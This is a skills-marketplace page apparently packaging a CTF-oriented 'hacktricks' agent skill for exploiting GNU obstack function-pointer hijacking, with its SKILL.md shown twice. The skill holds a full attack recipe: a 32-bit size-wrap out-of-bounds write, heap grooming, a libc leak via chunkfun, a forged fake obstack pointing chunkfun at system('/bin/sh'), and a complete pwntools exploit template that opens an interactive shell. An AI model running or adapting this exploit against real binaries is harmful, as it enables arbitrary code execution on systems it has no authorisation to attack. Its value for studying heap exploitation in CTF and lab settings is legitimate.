Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

abelrguezr/gnu-obstack-exploit

Name: gnu-obstack-exploit
Author: abelrguezr

skills/binary-exploitation/libc-heap/gnu-obstack-function-pointer-hijack/SKILL.md

npx skillsauth add abelrguezr/hacktricks-skills gnu-obstack-exploit

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

GNU Obstack Function-Pointer Hijacking Exploitation

This skill guides you through exploiting GNU obstack vulnerabilities to achieve arbitrary code execution via function-pointer hijacking.

When to Use This Skill

Use this skill when:

You're analyzing a binary that uses GNU obstacks (obstack_alloc, obstack_free, etc.)
You've identified a heap corruption vulnerability affecting obstack structures
You need to leak libc addresses through allocator function pointers
You want to hijack chunkfun or freefun for code execution
You're working on CTF challenges involving heap exploitation and obstacks

Core Concepts

Obstack Structure Layout (glibc 2.42)

struct obstack {
  char *chunk;           // +0x00  Current chunk base
  char *next_free;       // +0x08  Next allocation offset
  char *chunk_limit;     // +0x10  End of current chunk
  long chunk_size;       // +0x18  Current chunk size
  void (*chunkfun)(void *, size_t);  // +0x20  Allocation function
  void (*freefun)(void *, void *);   // +0x28  Free function
  void *extra_arg;       // +0x30  Extra argument for chunkfun
  int use_extra_arg;     // +0x38  Flag: use extra_arg in calls
  // ... additional fields
};

Key offsets for exploitation:

chunkfun: +0x20 (or +0x38 in some versions)
freefun: +0x28 (or +0x40 in some versions)
extra_arg: +0x30
use_extra_arg: +0x38

The Vulnerability Pattern

GNU obstacks trigger indirect calls through chunkfun when:

next_free == chunk_limit (chunk is full)
_obstack_newchunk is called to allocate a new chunk
The call goes through chunkfun(extra_arg, new_size) or chunkfun(new_size)

If you can corrupt an obstack structure, you control the function pointer.

Attack Recipe

Step 1: Identify the Size_t Desync Primitive

Look for this pattern in the binary:

// Vulnerable: 32-bit register used for multiplication
void *elements = obstack_alloc(obs, sizeof(void *) * size);

When compiled, sizeof(void *) * size may use a 32-bit register:

size = 0x20000000 → 0x20000000 * 8 = 0x100000000 → wraps to 0x0 in 32-bit
Result: 0-byte allocation but logical size remains 0x20000000
Subsequent writes: elements[curr++] = ptr; → 8-byte OOB pointer stores

Detection checklist:

[ ] Binary uses obstack_alloc with computed sizes
[ ] Size parameter comes from user input or is controllable
[ ] Multiplication involves sizeof(void *) or similar
[ ] 32-bit register used for the multiplication (check with objdump -d)

Step 2: Groom Heap Adjacency

You need two heap objects adjacent in memory:

[Object A: pointer array with OOB write primitive]
[Object B: contains obstack pointer or obstack structure]

Grooming strategy:

Allocate Object A (the pointer array with size wrap)
Allocate Object B (victim object with obstack pointer)
Ensure they're adjacent (may require freeing intermediate chunks)
Use OOB write from A to corrupt B

Step 3: Leak libc via chunkfun

The chunkfun field contains a pointer to malloc by default.

Leak procedure:

Use OOB write to redirect a victim pointer to the obstack structure
Read from offset 0x20 (or 0x38) to get malloc address
Calculate: libc_base = malloc_addr - malloc_offset
Derive other symbols: system = libc_base + system_offset, binsh = libc_base + binsh_offset

Example leak code:

# After OOB write redirects victim pointer to obstack
libc_leak = read_from_offset(victim_ptr, 0x20)  # chunkfun = malloc
libc_base = libc_leak - libc.symbols['malloc']
print(f"libc_base: {hex(libc_base)}")

Step 4: Forge a Fake Obstack

Create attacker-controlled data that mimics an obstack header:

from pwn import p64

def create_fake_obstack(system_addr, binsh_addr, heap_leak):
    fake = b""
    fake += p64(0x1000)          # chunk_size: large enough
    fake += p64(heap_leak)       # chunk: valid heap address
    fake += p64(heap_leak)       # object_base
    fake += p64(heap_leak)       # next_free: must equal chunk_limit
    fake += p64(heap_leak)       # chunk_limit: same as next_free
    fake += p64(0xF)             # alignment_mask
    fake += p64(0)               # temp
    fake += p64(system_addr)     # chunkfun: system()
    fake += p64(0)               # freefun: unused
    fake += p64(binsh_addr)      # extra_arg: "/bin/sh"
    fake += p64(1)               # use_extra_arg: enable 2-arg call
    return fake

Critical fields:

next_free == chunk_limit: Forces _obstack_newchunk on next allocation
chunkfun: Your target function (e.g., system)
extra_arg: First argument (e.g., "/bin/sh" address)
use_extra_arg = 1: Selects chunkfun(extra_arg, new_size) call form

Step 5: Trigger the Hijack

Overwrite the victim's struct obstack * pointer to point at your fake obstack
Trigger any allocation on the victim obstack
_obstack_newchunk calls chunkfun(extra_arg, new_size) → system("/bin/sh")

Trigger methods:

Call obstack_alloc(victim_obs, any_size)
Call obstack_push(victim_obs, any_data)
Any operation that requires new chunk allocation

Complete Exploit Template

from pwn import *

# Configuration
binary = './vulnerable_binary'
libc = ELF('./libc.so.6')

# Connect
p = process(binary)  # or remote('target', port)

# Step 1: Trigger size wrap
# Send size = 0x20000000 to create 0-byte allocation with huge logical size
p.sendlineafter(b'size', b'536870912')  # 0x20000000

# Step 2: Groom heap
# Allocate victim object with obstack pointer
p.sendlineafter(b'cmd', b'alloc_victim')

# Step 3: Leak libc
# Use OOB write to redirect pointer, then read chunkfun
p.sendlineafter(b'cmd', b'leak')
libc_leak = u64(p.recvline()[:6].ljust(8, b'\x00'))
libc_base = libc_leak - libc.symbols['malloc']
print(f"[*] libc_base: {hex(libc_base)}")

# Step 4: Create fake obstack
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
fake_obstack = create_fake_obstack(system_addr, binsh_addr, heap_leak)

# Step 5: Overwrite obstack pointer and trigger
p.sendlineafter(b'cmd', b'overwrite')
p.send(fake_obstack)
p.sendlineafter(b'cmd', b'alloc')  # Triggers the hijack

# Get shell
p.interactive()

Debugging Tips

Verify Obstack Offsets

# Check actual offsets in your libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep obstack

# Or use gdb
(gdb) p sizeof(struct obstack)
(gdb) p &((struct obstack*)0)->chunkfun

Check for Size Wrap

# Disassemble the vulnerable function
objdump -d binary | grep -A 20 "vulnerable_function"

# Look for SHL EAX (32-bit shift) instead of SHL RAX (64-bit)

Verify Heap Adjacency

# In gdb with pwndbg
heap
vmmap

Common Pitfalls

Wrong offsets: Obstruct layout varies by glibc version. Always verify offsets.
ASLR: Remember to leak libc before calculating addresses.
Canaries: If stack canaries are enabled, you may need to leak them first.
PIE: If PIE is enabled, you need to leak the binary base too.
Alignment: Obstacks may have alignment requirements. Check alignment_mask.

References

Flagvent 2025 FV25.08 obstack exploit
GNU Obstack Documentation
pwnlib heap exploitation

abelrguezr/gnu-obstack-exploit

skills/binary-exploitation/libc-heap/gnu-obstack-function-pointer-hijack/SKILL.md

How to exploit GNU obstack function-pointer hijacking vulnerabilities. Use this skill whenever the user mentions obstack, GNU obstack, chunkfun, freefun, heap exploitation, libc leaks, function pointer hijacking, or binary exploitation involving allocator state corruption. This skill covers size_t desync primitives, OOB pointer writes, libc base leaking, and fake obstack construction for arbitrary code execution.

5 stars

development

Updated Apr 16, 2026

$ install --global

skillsauth

npx skillsauth add abelrguezr/hacktricks-skills gnu-obstack-exploit

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Apr 16, 2026, 2:10 AM23.1s2 files scanned

SKILL.md

name:: gnu-obstack-exploit
description:: How to exploit GNU obstack function-pointer hijacking vulnerabilities. Use this skill whenever the user mentions obstack, GNU obstack, chunkfun, freefun, heap exploitation, libc leaks, function pointer hijacking, or binary exploitation involving allocator state corruption. This skill covers size_t desync primitives, OOB pointer writes, libc base leaking, and fake obstack construction for arbitrary code execution.

GNU Obstack Function-Pointer Hijacking Exploitation

This skill guides you through exploiting GNU obstack vulnerabilities to achieve arbitrary code execution via function-pointer hijacking.

When to Use This Skill

Use this skill when:

You're analyzing a binary that uses GNU obstacks (obstack_alloc, obstack_free, etc.)
You've identified a heap corruption vulnerability affecting obstack structures
You need to leak libc addresses through allocator function pointers
You want to hijack chunkfun or freefun for code execution
You're working on CTF challenges involving heap exploitation and obstacks

Core Concepts

Obstack Structure Layout (glibc 2.42)

struct obstack {
  char *chunk;           // +0x00  Current chunk base
  char *next_free;       // +0x08  Next allocation offset
  char *chunk_limit;     // +0x10  End of current chunk
  long chunk_size;       // +0x18  Current chunk size
  void (*chunkfun)(void *, size_t);  // +0x20  Allocation function
  void (*freefun)(void *, void *);   // +0x28  Free function
  void *extra_arg;       // +0x30  Extra argument for chunkfun
  int use_extra_arg;     // +0x38  Flag: use extra_arg in calls
  // ... additional fields
};

Key offsets for exploitation:

chunkfun: +0x20 (or +0x38 in some versions)
freefun: +0x28 (or +0x40 in some versions)
extra_arg: +0x30
use_extra_arg: +0x38

The Vulnerability Pattern

GNU obstacks trigger indirect calls through chunkfun when:

next_free == chunk_limit (chunk is full)
_obstack_newchunk is called to allocate a new chunk
The call goes through chunkfun(extra_arg, new_size) or chunkfun(new_size)

If you can corrupt an obstack structure, you control the function pointer.

Attack Recipe

Step 1: Identify the Size_t Desync Primitive

Look for this pattern in the binary:

// Vulnerable: 32-bit register used for multiplication
void *elements = obstack_alloc(obs, sizeof(void *) * size);

When compiled, sizeof(void *) * size may use a 32-bit register:

size = 0x20000000 → 0x20000000 * 8 = 0x100000000 → wraps to 0x0 in 32-bit
Result: 0-byte allocation but logical size remains 0x20000000
Subsequent writes: elements[curr++] = ptr; → 8-byte OOB pointer stores

Detection checklist:

[ ] Binary uses obstack_alloc with computed sizes
[ ] Size parameter comes from user input or is controllable
[ ] Multiplication involves sizeof(void *) or similar
[ ] 32-bit register used for the multiplication (check with objdump -d)

Step 2: Groom Heap Adjacency

You need two heap objects adjacent in memory:

[Object A: pointer array with OOB write primitive]
[Object B: contains obstack pointer or obstack structure]

Grooming strategy:

Allocate Object A (the pointer array with size wrap)
Allocate Object B (victim object with obstack pointer)
Ensure they're adjacent (may require freeing intermediate chunks)
Use OOB write from A to corrupt B

Step 3: Leak libc via chunkfun

The chunkfun field contains a pointer to malloc by default.

Leak procedure:

Use OOB write to redirect a victim pointer to the obstack structure
Read from offset 0x20 (or 0x38) to get malloc address
Calculate: libc_base = malloc_addr - malloc_offset
Derive other symbols: system = libc_base + system_offset, binsh = libc_base + binsh_offset

Example leak code:

# After OOB write redirects victim pointer to obstack
libc_leak = read_from_offset(victim_ptr, 0x20)  # chunkfun = malloc
libc_base = libc_leak - libc.symbols['malloc']
print(f"libc_base: {hex(libc_base)}")

Step 4: Forge a Fake Obstack

Create attacker-controlled data that mimics an obstack header:

from pwn import p64

def create_fake_obstack(system_addr, binsh_addr, heap_leak):
    fake = b""
    fake += p64(0x1000)          # chunk_size: large enough
    fake += p64(heap_leak)       # chunk: valid heap address
    fake += p64(heap_leak)       # object_base
    fake += p64(heap_leak)       # next_free: must equal chunk_limit
    fake += p64(heap_leak)       # chunk_limit: same as next_free
    fake += p64(0xF)             # alignment_mask
    fake += p64(0)               # temp
    fake += p64(system_addr)     # chunkfun: system()
    fake += p64(0)               # freefun: unused
    fake += p64(binsh_addr)      # extra_arg: "/bin/sh"
    fake += p64(1)               # use_extra_arg: enable 2-arg call
    return fake

Critical fields:

next_free == chunk_limit: Forces _obstack_newchunk on next allocation
chunkfun: Your target function (e.g., system)
extra_arg: First argument (e.g., "/bin/sh" address)
use_extra_arg = 1: Selects chunkfun(extra_arg, new_size) call form

Step 5: Trigger the Hijack

Overwrite the victim's struct obstack * pointer to point at your fake obstack
Trigger any allocation on the victim obstack
_obstack_newchunk calls chunkfun(extra_arg, new_size) → system("/bin/sh")

Trigger methods:

Call obstack_alloc(victim_obs, any_size)
Call obstack_push(victim_obs, any_data)
Any operation that requires new chunk allocation

Complete Exploit Template

from pwn import *

# Configuration
binary = './vulnerable_binary'
libc = ELF('./libc.so.6')

# Connect
p = process(binary)  # or remote('target', port)

# Step 1: Trigger size wrap
# Send size = 0x20000000 to create 0-byte allocation with huge logical size
p.sendlineafter(b'size', b'536870912')  # 0x20000000

# Step 2: Groom heap
# Allocate victim object with obstack pointer
p.sendlineafter(b'cmd', b'alloc_victim')

# Step 3: Leak libc
# Use OOB write to redirect pointer, then read chunkfun
p.sendlineafter(b'cmd', b'leak')
libc_leak = u64(p.recvline()[:6].ljust(8, b'\x00'))
libc_base = libc_leak - libc.symbols['malloc']
print(f"[*] libc_base: {hex(libc_base)}")

# Step 4: Create fake obstack
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
fake_obstack = create_fake_obstack(system_addr, binsh_addr, heap_leak)

# Step 5: Overwrite obstack pointer and trigger
p.sendlineafter(b'cmd', b'overwrite')
p.send(fake_obstack)
p.sendlineafter(b'cmd', b'alloc')  # Triggers the hijack

# Get shell
p.interactive()

Debugging Tips

Verify Obstack Offsets

# Check actual offsets in your libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep obstack

# Or use gdb
(gdb) p sizeof(struct obstack)
(gdb) p &((struct obstack*)0)->chunkfun

Check for Size Wrap

# Disassemble the vulnerable function
objdump -d binary | grep -A 20 "vulnerable_function"

# Look for SHL EAX (32-bit shift) instead of SHL RAX (64-bit)

Verify Heap Adjacency

# In gdb with pwndbg
heap
vmmap

Common Pitfalls

Wrong offsets: Obstruct layout varies by glibc version. Always verify offsets.
ASLR: Remember to leak libc before calculating addresses.
Canaries: If stack canaries are enabled, you may need to leak them first.
PIE: If PIE is enabled, you need to leak the binary base too.
Alignment: Obstacks may have alignment requirements. Check alignment_mask.

References

Flagvent 2025 FV25.08 obstack exploit
GNU Obstack Documentation
pwnlib heap exploitation

Related Skills

abelrguezr/house-of-lore-exploit

testing

VerifiedTrustedCommunity

How to perform a House of Lore (small bin attack) heap exploitation. Use this skill whenever the user mentions heap exploitation, small bin attacks, fake chunks, glibc heap vulnerabilities, or needs to insert fake chunks into small bins for arbitrary read/write. Trigger for CTF challenges involving heap corruption, glibc 2.31+ exploitation, or when the user needs to bypass malloc sanity checks using fake chunk linking.

5SKILL.mdUpdated Apr 16, 2026

abelrguezr/house-of-lore-exploit

abelrguezr/house-of-force-exploit

testing

VerifiedTrustedCommunity

How to perform House of Force heap exploitation attacks. Use this skill whenever the user mentions heap exploitation, House of Force, top chunk manipulation, arbitrary memory allocation, malloc manipulation, or wants to allocate chunks at specific addresses. Also trigger for CTF challenges involving heap overflows, top chunk size overwrites, or when the user needs to calculate evil_size for heap attacks. Make sure to use this skill for any binary exploitation task involving glibc heap manipulation, even if they don't explicitly say "House of Force".

5SKILL.mdUpdated Apr 16, 2026

abelrguezr/house-of-force-exploit

abelrguezr/house-of-einherjar

tools

VerifiedTrustedCommunity

How to perform House of Einherjar heap exploitation to allocate memory at arbitrary addresses. Use this skill whenever the user mentions heap exploitation, glibc heap attacks, arbitrary memory allocation, off-by-one overflow exploitation, tcache poisoning, fast bin attacks, or any CTF challenge involving heap manipulation. This is essential for binary exploitation tasks where you need to control malloc() return addresses.

5SKILL.mdUpdated Apr 16, 2026

abelrguezr/house-of-einherjar

abelrguezr/heap-overflow-exploitation

testing

VerifiedTrustedCommunity

How to identify, analyze, and exploit heap overflow vulnerabilities in binary exploitation challenges and real-world scenarios. Use this skill whenever the user mentions heap overflows, memory corruption, heap grooming, tcache poisoning, fast-bin attacks, or any heap-related vulnerability in CTF challenges, binary analysis, or security research. This skill covers heap overflow fundamentals, exploitation techniques, heap grooming strategies, and real-world CVE analysis.

5SKILL.mdUpdated Apr 16, 2026

abelrguezr/heap-overflow-exploitation

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/abelrguezr/hacktricks-skills.git

# Copy into Claude Code skills folder (global)
cp -r hacktricks-skills/skills/binary-exploitation/libc-heap/gnu-obstack-function-pointer-hijack ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

abelrguezr/hacktricks-skills

5 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT